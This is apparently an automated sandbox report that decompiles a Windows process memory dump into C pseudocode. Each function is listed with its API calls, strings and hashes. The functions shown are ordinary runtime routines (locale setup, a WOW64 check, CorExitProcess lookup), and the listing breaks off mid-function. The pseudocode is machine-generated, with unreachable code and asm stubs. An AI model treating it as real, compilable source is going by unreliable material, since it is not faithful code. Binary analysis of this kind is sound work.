                                                                                                				 *((intOrPtr*)(_t48 + 8)) = E00F7F7A0(_t28);
                                                                                                				_push(_t49 - 0x3c);
                                                                                                				_push(0);
                                                                                                				 *((intOrPtr*)(_t48 + 0x10)) = E00F7F7A0("false");
                                                                                                				_push(_t49 - 0x3c);
                                                                                                				_push(0);
                                                                                                				 *((intOrPtr*)(_t48 + 0x14)) = E00F7F7A0("true");
                                                                                                				if(_t39 == 0) {
                                                                                                					 *((char*)(_t48 + 0xc)) =  *((intOrPtr*)( *_t46));
                                                                                                					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t46 + 4))));
                                                                                                				} else {
                                                                                                					 *((char*)(_t48 + 0xc)) = 0x2e;
                                                                                                					_t37 = 0x2c;
                                                                                                				}
                                                                                                				 *((char*)(_t48 + 0xd)) = _t37;
                                                                                                				return E00FB38A1(_t37, _t46, _t48);
                                                                                                			}












                                                                                                0x00f83a55
                                                                                                0x00f83a55
                                                                                                0x00f83a55
                                                                                                0x00f83a5c
                                                                                                0x00f83a61
                                                                                                0x00f83a68
                                                                                                0x00f83a6e
                                                                                                0x00f83a75
                                                                                                0x00f83a78
                                                                                                0x00f83a7b
                                                                                                0x00f83a7e
                                                                                                0x00f83a81
                                                                                                0x00f83a88
                                                                                                0x00f83a8d
                                                                                                0x00f83a90
                                                                                                0x00f83a99
                                                                                                0x00f83a9b
                                                                                                0x00f83a9b
                                                                                                0x00f83aa1
                                                                                                0x00f83aa2
                                                                                                0x00f83aaa
                                                                                                0x00f83ab0
                                                                                                0x00f83ab1
                                                                                                0x00f83abd
                                                                                                0x00f83ac3
                                                                                                0x00f83ac4
                                                                                                0x00f83ad3
                                                                                                0x00f83ad8
                                                                                                0x00f83ae6
                                                                                                0x00f83aec
                                                                                                0x00f83ada
                                                                                                0x00f83ada
                                                                                                0x00f83ade
                                                                                                0x00f83ade
                                                                                                0x00f83aee
                                                                                                0x00f83af6

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Getcvt$H_prolog3_
                                                                                                • String ID: false$true
                                                                                                • API String ID: 4085572910-2658103896
                                                                                                • Opcode ID: 2422a2be675e59820b36d7378d2ab8ee9decfb3bf8afacf971867b150d90bf4c
                                                                                                • Instruction ID: ce545d95b5987bec3e66d26f1d1437167859a38d56a1c7e71b203c2568cbffcc
                                                                                                • Opcode Fuzzy Hash: 2422a2be675e59820b36d7378d2ab8ee9decfb3bf8afacf971867b150d90bf4c
                                                                                                • Instruction Fuzzy Hash: 0011B175904745AFC724FF74D842F9AB7F4AF05300F00892AF09587251EA34E604EB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 47%
                                                                                                			E00F76060() {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v16;
                                                                                                				char _v20;
                                                                                                				signed int _t14;
                                                                                                				signed int _t17;
                                                                                                				signed int _t21;
                                                                                                				intOrPtr* _t32;
                                                                                                				signed int _t35;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb5e5e);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t14 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t14 ^ _t35);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t17 =  *0xfd2564;
                                                                                                				if((_t17 & 0x00000001) != 0) {
                                                                                                					_t32 =  *0xfd2568;
                                                                                                				} else {
                                                                                                					 *0xfd2564 = _t17 | 0x00000001;
                                                                                                					_v8 = 0;
                                                                                                					_t32 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
                                                                                                					 *0xfd2568 = _t32;
                                                                                                					_v8 = 0xffffffff;
                                                                                                				}
                                                                                                				if(_t32 == 0) {
                                                                                                					L6:
                                                                                                					 *[fs:0x0] = _v16;
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					_v20 = 0;
                                                                                                					_t21 =  *_t32(GetCurrentProcess(),  &_v20);
                                                                                                					if(_t21 == 0) {
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						 *[fs:0x0] = _v16;
                                                                                                						return _t21 & 0xffffff00 | _v20 == 0x00000001;
                                                                                                					}
                                                                                                				}
                                                                                                			}











                                                                                                0x00f76063
                                                                                                0x00f76065
                                                                                                0x00f76070
                                                                                                0x00f76073
                                                                                                0x00f7607a
                                                                                                0x00f7607e
                                                                                                0x00f76084
                                                                                                0x00f7608b
                                                                                                0x00f760c4
                                                                                                0x00f7608d
                                                                                                0x00f76090
                                                                                                0x00f76095
                                                                                                0x00f760b3
                                                                                                0x00f760b5
                                                                                                0x00f760bb
                                                                                                0x00f760bb
                                                                                                0x00f760cc
                                                                                                0x00f760fd
                                                                                                0x00f76102
                                                                                                0x00f7610e
                                                                                                0x00f760ce
                                                                                                0x00f760d1
                                                                                                0x00f760e0
                                                                                                0x00f760e4
                                                                                                0x00000000
                                                                                                0x00f760e6
                                                                                                0x00f760f0
                                                                                                0x00f760fc
                                                                                                0x00f760fc
                                                                                                0x00f760e4

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,FD8FA683,74B5E730,?,00000000,00FB5E5E,000000FF,?,00F76502), ref: 00F760A6
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00F760AD
                                                                                                • GetCurrentProcess.KERNEL32(000000FF,FD8FA683,74B5E730,?,00000000,00FB5E5E), ref: 00F760D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                • String ID: IsWow64Process$kernel32
                                                                                                • API String ID: 4190356694-3789238822
                                                                                                • Opcode ID: 0246156f6fa10ad86edae949dfecc1a03bcead06fe2d471bc798caae2bb74416
                                                                                                • Instruction ID: 768a6f034d3d654661b98aea81f4d258b96338b0df038b30fb3e8bc648c2cc92
                                                                                                • Opcode Fuzzy Hash: 0246156f6fa10ad86edae949dfecc1a03bcead06fe2d471bc798caae2bb74416
                                                                                                • Instruction Fuzzy Hash: 39119E72D09718DFCB20CFA4ED45BA9B7A8FB04B60F04465BE814D3290DB75A909EB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E00FA25A0(void* __ecx, intOrPtr _a4) {
                                                                                                				signed int _v8;
                                                                                                				_Unknown_base(*)()* _t8;
                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                
                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                				_t8 =  &_v8;
                                                                                                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
                                                                                                				if(_t8 != 0) {
                                                                                                					_t8 = GetProcAddress(_v8, "CorExitProcess");
                                                                                                					_t14 = _t8;
                                                                                                					if(_t14 != 0) {
                                                                                                						 *0xfb81fc(_a4);
                                                                                                						_t8 =  *_t14();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_v8 != 0) {
                                                                                                					return FreeLibrary(_v8);
                                                                                                				}
                                                                                                				return _t8;
                                                                                                			}






                                                                                                0x00fa25a6
                                                                                                0x00fa25aa
                                                                                                0x00fa25b5
                                                                                                0x00fa25bd
                                                                                                0x00fa25c8
                                                                                                0x00fa25ce
                                                                                                0x00fa25d2
                                                                                                0x00fa25d9
                                                                                                0x00fa25df
                                                                                                0x00fa25df
                                                                                                0x00fa25e1
                                                                                                0x00fa25e6
                                                                                                0x00000000
                                                                                                0x00fa25eb
                                                                                                0x00fa25f4

                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00FA2595,00F79528,?,00FA255D,?,?,00F79528), ref: 00FA25B5
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FA25C8
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00FA2595,00F79528,?,00FA255D,?,?,00F79528), ref: 00FA25EB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 36cbd54a3bf74e1e1bb35e8eaaddc0a1ab68a9194477c41d5e8d13674af17ea0
                                                                                                • Instruction ID: 95e255e152b911d7630bfea4795fd4598517ed03f01a1e3d74d5d8e60fd0ea23
                                                                                                • Opcode Fuzzy Hash: 36cbd54a3bf74e1e1bb35e8eaaddc0a1ab68a9194477c41d5e8d13674af17ea0
                                                                                                • Instruction Fuzzy Hash: B4F05E31E0161DFBCB22AB95DD49BDE7A68EB417E2F184160F805A1160CF309F05FE91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E00FA3D83(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                				intOrPtr* _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr* _v20;
                                                                                                				signed int _v40;
                                                                                                				signed int _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				signed int _v60;
                                                                                                				char _v276;
                                                                                                				short _v278;
                                                                                                				short _v280;
                                                                                                				char _v448;
                                                                                                				signed int _v452;
                                                                                                				short _v454;
                                                                                                				intOrPtr _v456;
                                                                                                				signed int _v460;
                                                                                                				intOrPtr _v464;
                                                                                                				signed int _v468;
                                                                                                				signed int _v472;
                                                                                                				intOrPtr _v512;
                                                                                                				char _v536;
                                                                                                				intOrPtr _v540;
                                                                                                				signed int _v544;
                                                                                                				intOrPtr _v548;
                                                                                                				signed int _v560;
                                                                                                				char _v708;
                                                                                                				signed int _v712;
                                                                                                				short _v714;
                                                                                                				signed int* _v716;
                                                                                                				signed int _v720;
                                                                                                				signed int _v724;
                                                                                                				signed int _v728;
                                                                                                				signed int* _v732;
                                                                                                				intOrPtr _v736;
                                                                                                				signed int _v740;
                                                                                                				signed int _v744;
                                                                                                				signed int _v748;
                                                                                                				signed int _v752;
                                                                                                				char _v824;
                                                                                                				char _v1252;
                                                                                                				char _v1264;
                                                                                                				intOrPtr _v1276;
                                                                                                				signed int _v1288;
                                                                                                				signed int _t240;
                                                                                                				void* _t243;
                                                                                                				signed int _t246;
                                                                                                				signed int _t248;
                                                                                                				signed int _t254;
                                                                                                				signed int _t255;
                                                                                                				signed int _t256;
                                                                                                				signed int _t257;
                                                                                                				signed int _t258;
                                                                                                				signed int _t260;
                                                                                                				signed int _t262;
                                                                                                				void* _t264;
                                                                                                				signed int _t265;
                                                                                                				signed int _t266;
                                                                                                				signed int _t267;
                                                                                                				signed int _t269;
                                                                                                				signed int _t272;
                                                                                                				signed int _t279;
                                                                                                				signed int _t282;
                                                                                                				signed int _t283;
                                                                                                				intOrPtr _t284;
                                                                                                				signed int _t287;
                                                                                                				signed int _t289;
                                                                                                				signed int _t290;
                                                                                                				intOrPtr _t292;
                                                                                                				signed int _t295;
                                                                                                				signed int _t296;
                                                                                                				signed int _t298;
                                                                                                				signed int _t318;
                                                                                                				signed int _t320;
                                                                                                				signed int _t322;
                                                                                                				signed int _t327;
                                                                                                				void* _t329;
                                                                                                				signed int _t331;
                                                                                                				void* _t332;
                                                                                                				intOrPtr _t333;
                                                                                                				signed int _t338;
                                                                                                				signed int _t339;
                                                                                                				intOrPtr* _t344;
                                                                                                				signed int _t358;
                                                                                                				signed int _t360;
                                                                                                				signed int _t362;
                                                                                                				intOrPtr* _t363;
                                                                                                				signed int _t365;
                                                                                                				intOrPtr* _t370;
                                                                                                				intOrPtr* _t375;
                                                                                                				intOrPtr* _t378;
                                                                                                				void* _t381;
                                                                                                				signed int _t382;
                                                                                                				signed int _t385;
                                                                                                				intOrPtr* _t386;
                                                                                                				signed int _t395;
                                                                                                				intOrPtr _t398;
                                                                                                				intOrPtr* _t399;
                                                                                                				signed int _t401;
                                                                                                				signed int* _t405;
                                                                                                				signed int _t406;
                                                                                                				intOrPtr* _t412;
                                                                                                				signed int _t421;
                                                                                                				short _t422;
                                                                                                				signed int _t424;
                                                                                                				intOrPtr _t425;
                                                                                                				signed int _t428;
                                                                                                				intOrPtr _t429;
                                                                                                				signed int _t431;
                                                                                                				signed int _t434;
                                                                                                				intOrPtr _t440;
                                                                                                				signed int _t441;
                                                                                                				signed int _t443;
                                                                                                				signed int _t444;
                                                                                                				signed int _t448;
                                                                                                				signed int _t450;
                                                                                                				signed int _t453;
                                                                                                				signed int* _t454;
                                                                                                				intOrPtr* _t455;
                                                                                                				short _t456;
                                                                                                				void* _t458;
                                                                                                				signed int _t460;
                                                                                                				signed int _t462;
                                                                                                				void* _t464;
                                                                                                				void* _t465;
                                                                                                				void* _t467;
                                                                                                				signed int _t468;
                                                                                                				void* _t469;
                                                                                                				void* _t471;
                                                                                                				signed int _t472;
                                                                                                				void* _t474;
                                                                                                				void* _t476;
                                                                                                				signed int _t488;
                                                                                                
                                                                                                				_t420 = __edx;
                                                                                                				_t458 = _t464;
                                                                                                				_t465 = _t464 - 0x10;
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_v12 = 1;
                                                                                                				_t358 = E00FA60D9(0x6a6);
                                                                                                				_t239 = 0;
                                                                                                				_pop(_t370);
                                                                                                				if(_t358 == 0) {
                                                                                                					L20:
                                                                                                					return _t239;
                                                                                                				} else {
                                                                                                					_push(__edi);
                                                                                                					_t2 = _t358 + 4; // 0x4
                                                                                                					_t424 = _t2;
                                                                                                					 *_t424 = 0;
                                                                                                					 *_t358 = 1;
                                                                                                					_t440 = _a4;
                                                                                                					_t240 = _t440 + 0x30;
                                                                                                					_push( *_t240);
                                                                                                					_v16 = _t240;
                                                                                                					_push(0xfbc7e0);
                                                                                                					_push( *0xfbc71c);
                                                                                                					E00FA3CBD(_t358, _t370, _t424, _t440, _t424, 0x351, 3);
                                                                                                					_t467 = _t465 + 0x18;
                                                                                                					_v8 = 0xfbc71c;
                                                                                                					while(1) {
                                                                                                						L2:
                                                                                                						_t243 = E00FAAA2C(_t424, 0x351, 0xfbc7dc);
                                                                                                						_t468 = _t467 + 0xc;
                                                                                                						if(_t243 != 0) {
                                                                                                							break;
                                                                                                						} else {
                                                                                                							_t8 = _v16 + 0x10; // 0x10
                                                                                                							_t412 = _t8;
                                                                                                							_t338 =  *_v16;
                                                                                                							_v16 = _t412;
                                                                                                							_t370 =  *_t412;
                                                                                                							_v20 = _t370;
                                                                                                							goto L4;
                                                                                                						}
                                                                                                						while(1) {
                                                                                                							L4:
                                                                                                							_t420 =  *_t338;
                                                                                                							if(_t420 !=  *_t370) {
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_t420 == 0) {
                                                                                                								L8:
                                                                                                								_t339 = 0;
                                                                                                							} else {
                                                                                                								_t420 =  *((intOrPtr*)(_t338 + 2));
                                                                                                								if(_t420 !=  *((intOrPtr*)(_t370 + 2))) {
                                                                                                									break;
                                                                                                								} else {
                                                                                                									_t338 = _t338 + 4;
                                                                                                									_t370 = _t370 + 4;
                                                                                                									if(_t420 != 0) {
                                                                                                										continue;
                                                                                                									} else {
                                                                                                										goto L8;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							L10:
                                                                                                							_push(_v20);
                                                                                                							_push(0xfbc7e0);
                                                                                                							asm("sbb eax, eax");
                                                                                                							_v12 = _v12 &  !( ~_t339);
                                                                                                							_t344 = _v8 + 0xc;
                                                                                                							_v8 = _t344;
                                                                                                							_push( *_t344);
                                                                                                							E00FA3CBD(_t358, _t370, _t424, _t440, _t424, 0x351, 3);
                                                                                                							_t467 = _t468 + 0x18;
                                                                                                							if(_v8 < 0xfbc74c) {
                                                                                                								goto L2;
                                                                                                							} else {
                                                                                                								if(_v12 != 0) {
                                                                                                									E00FA609F(_t358);
                                                                                                									_t431 = _t424 | 0xffffffff;
                                                                                                									__eflags =  *(_t440 + 0x28);
                                                                                                									if(__eflags != 0) {
                                                                                                										asm("lock xadd [ecx], eax");
                                                                                                										if(__eflags == 0) {
                                                                                                											E00FA609F( *(_t440 + 0x28));
                                                                                                										}
                                                                                                									}
                                                                                                									__eflags =  *(_t440 + 0x24);
                                                                                                									if( *(_t440 + 0x24) != 0) {
                                                                                                										asm("lock xadd [eax], edi");
                                                                                                										__eflags = _t431 == 1;
                                                                                                										if(_t431 == 1) {
                                                                                                											E00FA609F( *(_t440 + 0x24));
                                                                                                										}
                                                                                                									}
                                                                                                									 *(_t440 + 0x24) = 0;
                                                                                                									 *(_t440 + 0x1c) = 0;
                                                                                                									 *(_t440 + 0x28) = 0;
                                                                                                									 *((intOrPtr*)(_t440 + 0x20)) = 0;
                                                                                                									_t239 =  *((intOrPtr*)(_t440 + 0x40));
                                                                                                								} else {
                                                                                                									_t434 = _t424 | 0xffffffff;
                                                                                                									_t488 =  *(_t440 + 0x28);
                                                                                                									if(_t488 != 0) {
                                                                                                										asm("lock xadd [ecx], eax");
                                                                                                										if(_t488 == 0) {
                                                                                                											E00FA609F( *(_t440 + 0x28));
                                                                                                										}
                                                                                                									}
                                                                                                									if( *(_t440 + 0x24) != 0) {
                                                                                                										asm("lock xadd [eax], edi");
                                                                                                										if(_t434 == 1) {
                                                                                                											E00FA609F( *(_t440 + 0x24));
                                                                                                										}
                                                                                                									}
                                                                                                									 *(_t440 + 0x24) =  *(_t440 + 0x24) & 0x00000000;
                                                                                                									_t28 = _t358 + 4; // 0x4
                                                                                                									_t239 = _t28;
                                                                                                									 *(_t440 + 0x1c) =  *(_t440 + 0x1c) & 0x00000000;
                                                                                                									 *(_t440 + 0x28) = _t358;
                                                                                                									 *((intOrPtr*)(_t440 + 0x20)) = _t239;
                                                                                                								}
                                                                                                								goto L20;
                                                                                                							}
                                                                                                							goto L131;
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t339 = _t338 | 0x00000001;
                                                                                                						__eflags = _t339;
                                                                                                						goto L10;
                                                                                                					}
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					E00F98DB9();
                                                                                                					asm("int3");
                                                                                                					_push(_t458);
                                                                                                					_t460 = _t468;
                                                                                                					_t469 = _t468 - 0x1d0;
                                                                                                					_t246 =  *0xfcf00c; // 0xfd8fa683
                                                                                                					_v60 = _t246 ^ _t460;
                                                                                                					_t248 = _v44;
                                                                                                					_push(_t358);
                                                                                                					_push(_t440);
                                                                                                					_t441 = _v40;
                                                                                                					_push(_t424);
                                                                                                					_t425 = _v48;
                                                                                                					_v512 = _t425;
                                                                                                					__eflags = _t248;
                                                                                                					if(_t248 == 0) {
                                                                                                						_v460 = 1;
                                                                                                						_v468 = 0;
                                                                                                						_t360 = 0;
                                                                                                						_v452 = 0;
                                                                                                						__eflags = _t441;
                                                                                                						if(__eflags == 0) {
                                                                                                							L79:
                                                                                                							E00FA3D83(_t360, _t420, _t425, _t441, __eflags, _t425);
                                                                                                							goto L80;
                                                                                                						} else {
                                                                                                							__eflags =  *_t441 - 0x4c;
                                                                                                							if( *_t441 != 0x4c) {
                                                                                                								L59:
                                                                                                								_t254 = E00FA38DF(_t360, _t370, _t420, _t425, _t441, _t441,  &_v276, 0x83,  &_v448, 0x55, 0);
                                                                                                								_t471 = _t469 + 0x18;
                                                                                                								__eflags = _t254;
                                                                                                								if(_t254 != 0) {
                                                                                                									__eflags = 0;
                                                                                                									_t421 = _t425 + 0x20;
                                                                                                									_t443 = 0;
                                                                                                									_v452 = _t421;
                                                                                                									do {
                                                                                                										__eflags = _t443;
                                                                                                										if(_t443 == 0) {
                                                                                                											L74:
                                                                                                											_t255 = _v460;
                                                                                                										} else {
                                                                                                											_t375 =  *_t421;
                                                                                                											_t256 =  &_v276;
                                                                                                											while(1) {
                                                                                                												__eflags =  *_t256 -  *_t375;
                                                                                                												_t425 = _v464;
                                                                                                												if( *_t256 !=  *_t375) {
                                                                                                													break;
                                                                                                												}
                                                                                                												__eflags =  *_t256;
                                                                                                												if( *_t256 == 0) {
                                                                                                													L67:
                                                                                                													_t257 = 0;
                                                                                                												} else {
                                                                                                													_t422 =  *((intOrPtr*)(_t256 + 2));
                                                                                                													__eflags = _t422 -  *((intOrPtr*)(_t375 + 2));
                                                                                                													_v454 = _t422;
                                                                                                													_t421 = _v452;
                                                                                                													if(_t422 !=  *((intOrPtr*)(_t375 + 2))) {
                                                                                                														break;
                                                                                                													} else {
                                                                                                														_t256 = _t256 + 4;
                                                                                                														_t375 = _t375 + 4;
                                                                                                														__eflags = _v454;
                                                                                                														if(_v454 != 0) {
                                                                                                															continue;
                                                                                                														} else {
                                                                                                															goto L67;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                												L69:
                                                                                                												__eflags = _t257;
                                                                                                												if(_t257 == 0) {
                                                                                                													_t360 = _t360 + 1;
                                                                                                													__eflags = _t360;
                                                                                                													goto L74;
                                                                                                												} else {
                                                                                                													_t258 =  &_v276;
                                                                                                													_push(_t258);
                                                                                                													_push(_t443);
                                                                                                													_push(_t425);
                                                                                                													L83();
                                                                                                													_t421 = _v452;
                                                                                                													_t471 = _t471 + 0xc;
                                                                                                													__eflags = _t258;
                                                                                                													if(_t258 == 0) {
                                                                                                														_t255 = 0;
                                                                                                														_v460 = 0;
                                                                                                													} else {
                                                                                                														_t360 = _t360 + 1;
                                                                                                														goto L74;
                                                                                                													}
                                                                                                												}
                                                                                                												goto L75;
                                                                                                											}
                                                                                                											asm("sbb eax, eax");
                                                                                                											_t257 = _t256 | 0x00000001;
                                                                                                											__eflags = 0;
                                                                                                											goto L69;
                                                                                                										}
                                                                                                										L75:
                                                                                                										_t443 = _t443 + 1;
                                                                                                										_t421 = _t421 + 0x10;
                                                                                                										_v452 = _t421;
                                                                                                										__eflags = _t443 - 5;
                                                                                                									} while (_t443 <= 5);
                                                                                                									__eflags = _t255;
                                                                                                									if(__eflags != 0) {
                                                                                                										goto L79;
                                                                                                									} else {
                                                                                                										__eflags = _t360;
                                                                                                										if(__eflags != 0) {
                                                                                                											goto L79;
                                                                                                										} else {
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								goto L80;
                                                                                                							} else {
                                                                                                								__eflags =  *(_t441 + 2) - 0x43;
                                                                                                								if( *(_t441 + 2) != 0x43) {
                                                                                                									goto L59;
                                                                                                								} else {
                                                                                                									__eflags =  *((short*)(_t441 + 4)) - 0x5f;
                                                                                                									if( *((short*)(_t441 + 4)) != 0x5f) {
                                                                                                										goto L59;
                                                                                                									} else {
                                                                                                										while(1) {
                                                                                                											_t260 = E00FAB99F(_t441, 0xfbc7d4);
                                                                                                											_t362 = _t260;
                                                                                                											_v472 = _t362;
                                                                                                											_pop(_t377);
                                                                                                											__eflags = _t362;
                                                                                                											if(_t362 == 0) {
                                                                                                												break;
                                                                                                											}
                                                                                                											_t262 = _t260 - _t441;
                                                                                                											__eflags = _t262;
                                                                                                											_v460 = _t262 >> 1;
                                                                                                											if(_t262 == 0) {
                                                                                                												break;
                                                                                                											} else {
                                                                                                												_t264 = 0x3b;
                                                                                                												__eflags =  *_t362 - _t264;
                                                                                                												if( *_t362 == _t264) {
                                                                                                													break;
                                                                                                												} else {
                                                                                                													_t428 = _v460;
                                                                                                													_t363 = 0xfbc71c;
                                                                                                													_v456 = 1;
                                                                                                													do {
                                                                                                														_t265 = E00F9BE48( *_t363, _t441, _t428);
                                                                                                														_t469 = _t469 + 0xc;
                                                                                                														__eflags = _t265;
                                                                                                														if(_t265 != 0) {
                                                                                                															goto L45;
                                                                                                														} else {
                                                                                                															_t378 =  *_t363;
                                                                                                															_t420 = _t378 + 2;
                                                                                                															do {
                                                                                                																_t333 =  *_t378;
                                                                                                																_t378 = _t378 + 2;
                                                                                                																__eflags = _t333 - _v468;
                                                                                                															} while (_t333 != _v468);
                                                                                                															_t377 = _t378 - _t420 >> 1;
                                                                                                															__eflags = _t428 - _t378 - _t420 >> 1;
                                                                                                															if(_t428 != _t378 - _t420 >> 1) {
                                                                                                																goto L45;
                                                                                                															}
                                                                                                														}
                                                                                                														break;
                                                                                                														L45:
                                                                                                														_v456 = _v456 + 1;
                                                                                                														_t363 = _t363 + 0xc;
                                                                                                														__eflags = _t363 - 0xfbc74c;
                                                                                                													} while (_t363 <= 0xfbc74c);
                                                                                                													_t360 = _v472 + 2;
                                                                                                													_t266 = E00FAB944(_t377, _t360, 0xfbc7dc);
                                                                                                													_t425 = _v464;
                                                                                                													_t444 = _t266;
                                                                                                													_pop(_t381);
                                                                                                													__eflags = _t444;
                                                                                                													if(_t444 != 0) {
                                                                                                														L48:
                                                                                                														__eflags = _v456 - 5;
                                                                                                														if(_v456 > 5) {
                                                                                                															_t382 = _v452;
                                                                                                															goto L54;
                                                                                                														} else {
                                                                                                															_push(_t444);
                                                                                                															_t269 = E00FAAB6C( &_v276, 0x83, _t360);
                                                                                                															_t472 = _t469 + 0x10;
                                                                                                															__eflags = _t269;
                                                                                                															if(_t269 != 0) {
                                                                                                																L82:
                                                                                                																_push(0);
                                                                                                																_push(0);
                                                                                                																_push(0);
                                                                                                																_push(0);
                                                                                                																_push(0);
                                                                                                																E00F98DB9();
                                                                                                																asm("int3");
                                                                                                																_push(_t460);
                                                                                                																_t462 = _t472;
                                                                                                																_t272 =  *0xfcf00c; // 0xfd8fa683
                                                                                                																_v560 = _t272 ^ _t462;
                                                                                                																_push(_t360);
                                                                                                																_t365 = _v544;
                                                                                                																_push(_t444);
                                                                                                																_push(_t425);
                                                                                                																_t429 = _v548;
                                                                                                																_v1288 = _t365;
                                                                                                																_v1276 = E00FA5DF2(_t381, _t420) + 0x278;
                                                                                                																_t279 = E00FA38DF(_t365, _t381, _t420, _t429, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
                                                                                                																_t474 = _t472 - 0x2e4 + 0x18;
                                                                                                																__eflags = _t279;
                                                                                                																if(_t279 == 0) {
                                                                                                																	L122:
                                                                                                																	__eflags = 0;
                                                                                                																	goto L123;
                                                                                                																} else {
                                                                                                																	_t102 = _t365 + 2; // 0x6
                                                                                                																	_t448 = _t102 << 4;
                                                                                                																	__eflags = _t448;
                                                                                                																	_t282 =  &_v280;
                                                                                                																	_v724 = _t448;
                                                                                                																	_t420 =  *(_t448 + _t429);
                                                                                                																	_t385 =  *(_t448 + _t429);
                                                                                                																	while(1) {
                                                                                                																		_v712 = _v712 & 0x00000000;
                                                                                                																		__eflags =  *_t282 -  *_t385;
                                                                                                																		_t450 = _v724;
                                                                                                																		if( *_t282 !=  *_t385) {
                                                                                                																			break;
                                                                                                																		}
                                                                                                																		__eflags =  *_t282;
                                                                                                																		if( *_t282 == 0) {
                                                                                                																			L89:
                                                                                                																			_t283 = _v712;
                                                                                                																		} else {
                                                                                                																			_t456 =  *((intOrPtr*)(_t282 + 2));
                                                                                                																			__eflags = _t456 -  *((intOrPtr*)(_t385 + 2));
                                                                                                																			_v714 = _t456;
                                                                                                																			_t450 = _v724;
                                                                                                																			if(_t456 !=  *((intOrPtr*)(_t385 + 2))) {
                                                                                                																				break;
                                                                                                																			} else {
                                                                                                																				_t282 = _t282 + 4;
                                                                                                																				_t385 = _t385 + 4;
                                                                                                																				__eflags = _v714;
                                                                                                																				if(_v714 != 0) {
                                                                                                																					continue;
                                                                                                																				} else {
                                                                                                																					goto L89;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		}
                                                                                                																		L91:
                                                                                                																		__eflags = _t283;
                                                                                                																		if(_t283 != 0) {
                                                                                                																			_t386 =  &_v280;
                                                                                                																			_t420 = _t386 + 2;
                                                                                                																			do {
                                                                                                																				_t284 =  *_t386;
                                                                                                																				_t386 = _t386 + 2;
                                                                                                																				__eflags = _t284 - _v712;
                                                                                                																			} while (_t284 != _v712);
                                                                                                																			_v728 = (_t386 - _t420 >> 1) + 1;
                                                                                                																			_t287 = E00FA60D9(4 + ((_t386 - _t420 >> 1) + 1) * 2);
                                                                                                																			_v740 = _t287;
                                                                                                																			__eflags = _t287;
                                                                                                																			if(_t287 == 0) {
                                                                                                																				goto L122;
                                                                                                																			} else {
